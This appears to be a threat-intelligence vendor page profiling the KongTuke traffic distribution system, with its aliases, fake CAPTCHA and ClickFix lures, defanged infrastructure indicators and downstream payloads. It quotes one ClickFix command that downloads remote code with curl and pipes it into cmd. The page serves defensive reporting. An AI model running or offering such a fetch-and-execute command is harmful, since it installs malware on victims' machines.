Kongtuke
KongTuke is a traffic distribution system (TDS), first observed in 2024, that leverages compromised WordPress sites to inject malicious JavaScript and redirect visitors into malware delivery chains. It is also referred to as 404 TDS, Chaya_002, LandUpdate808, TAG-124, and js.LandUpdate808; ThreatFox tracks it as js.kongtuke. Reporting states it used fake CAPTCHA, ClickFix, and FileFix-style paste-and-run social engineering, including clipboard-injected commands that trick users into executing cmd or PowerShell. Observed delivery chains include compromised sites loading staged JavaScript and clipboard infrastructure from nitzschi[.]com (including /file.js, /t, /g, and /c) followed by payload retrieval from 49xb5hoiqsr[.]com/dl/agent.bat and /dl/update.zip. Another documented ClickFix chain injected the command cmd.exe /c start "" /min cmd /k "curl hxxp://144.31.221[.]60/a | cmd && exit" and led to additional activity involving frttsch[.]com, 144.31.221[.]60, 144.31.221[.]71/final10, bz1d0zvfi03yhn1[.]top/getarchive, ey267te[.]top, fnjnbehjangelkd[.]top, checkifhuman[.]top, and a trycloudflare.com tunnel. In that chain, password-protected ZIP payloads were downloaded and extracted under AppData paths including SoftwareProtectionPlatform and figmaUpdater, and persistence was established via scheduled tasks named SoftwareProtection and Remove-NetNatStaticMapping. KongTuke activity has been linked to injected scripts on compromised websites that generate fake CAPTCHA pages and browser-verification lures, including infrastructure such as porsasystem[.]com and brazilc[.]com. Reported downstream payloads associated with KongTuke include MintsLoader, GhostWeaver RAT, WARMCOOKIE, D3F@ck Loader, Mocha Manakin, Node.js-based backdoors and RATs, and campaigns that may lead to Rhysida and Interlock ransomware. ThreatFox lists first seen as 2025-05-05 15:47:05 UTC, last seen as 2026-05-21 04:59:53 UTC, and 949 associated IOCs. WithSecure also observed PhantomRelay variants in a KongTuke delivery chain between late February and late March 2026 that used ClickFix.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Techniques & procedures
5 distinct techniques documented for this family, organized by ATT&CK tactic.
IOCs tracked for this family
60 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as a delivery chain in which ClickFix was used to distribute PhantomRelay variants in related cybercrime activity clusters.
KongTuke is referenced as the malware involved in an infection chain delivered via a compromised site, intermediary JavaScript and gateway stages, and final BAT/ZIP payload retrieval.
A traffic distribution system that leverages compromised WordPress sites and used fakeCAPTCHA and FileFix paste-and-run variants in 2025.
Traffic distribution system leveraging compromised WordPress sites to deploy a variety of malware, including ransomware and loaders.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.